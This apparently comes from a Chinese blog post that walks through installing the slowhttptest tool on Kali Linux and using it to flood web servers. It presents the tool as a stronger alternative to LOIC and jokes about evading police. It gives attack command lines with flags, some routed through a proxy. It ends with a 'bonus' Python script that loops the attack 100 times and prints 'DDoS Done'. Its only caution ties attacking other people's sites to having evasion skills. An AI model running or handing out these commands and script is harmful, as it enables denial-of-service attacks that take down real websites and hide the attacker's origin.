slowhttptest是一款Web压力测试软件,比LOIC牛逼多了,接下来我将介绍这款工具的安装和基本使用,高级的方法大家可以参考帮助和文档;
这种教程只能写得隐晦点,怕被查水表。。。
1:首先安装支持环境:libssl-dev,这里建立把工具安装在kali下面,因为kali集成了很多环境,不用我们自己再一个个安装。
图1-1.
2:通过git下载文件.
图1-2.
3:./configure运行环境检查脚本。
图1-3.
注意:如果遇到运行configure显示配置选项为NO的,表示环境没有安装,apt-get install 逐个安装即可。
4:运行make命令,然后运行make install命令。
注意:如果运行make命令提示报错,估计就是你的环境没安装好,安装下面的包应该可以解决。
4.1:使用apt-get update更新源
4.2:安装以下的包:
autotools-dev
automake
autoconf2.13
m4
perl
libperl5.14
5:全部安装好之后运行slowhttptest命令,成功则会显示下图的界面。
图1-4.
6:使用方法:
实例1:
slowhttptest -X -u url -l 60 -c 65539
-X 慢速攻击,向服务器慢速发送数据包造成堵塞
-l 持续攻击时间
-c 向服务器发起的连接数,限制为65539
-u 目标网址
实例2:
slowhttptest -c 1000 -X -g -o slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -e 117.90.137.34:9000 -u url -p 3
-g:生成带有套接字状态更改的统计信息(off)
-o:文件前缀保存文件中的统计输出;html和文件;csv(需要参数g)
-r:连接速率/秒(50)
-w:窗口开始的大小,范围从1开始,后跟bytes
-y: 窗口结束的大小,范围到512结束,后跟是bytes
-n:在1秒之中从recv缓冲区读取操作的间隔
-z:用单个read()调用来从接收缓冲区中缓慢读取字节,后跟字节
-k:在连接中重复相同请求的次数。如果服务器支持持久连接(1),那么使用响应大小相乘
-p:检测连接上等待HTTP响应的超时,在此参数后服务器被认为是不可访问的(5)
-e: 使用http代理流量
图1-5.
最后冒死发一波福利。
用Python实现自动化“测试”!
#!usr/bin/python
import os
'slowhttptest.py -- author:replaceroot'
for i in range(100):
os.system("slowhttptest -X -e 123.123.123.123:123 -u http://www.test.com/ -l 60 -c 65539")
print '\n\033[34;1m[Done]\033[0mDDoS Done...'
温馨提醒:建议自己用虚拟机搭环境测试,没有强大的自信和逃逸技术,不要拿别人网站测试!
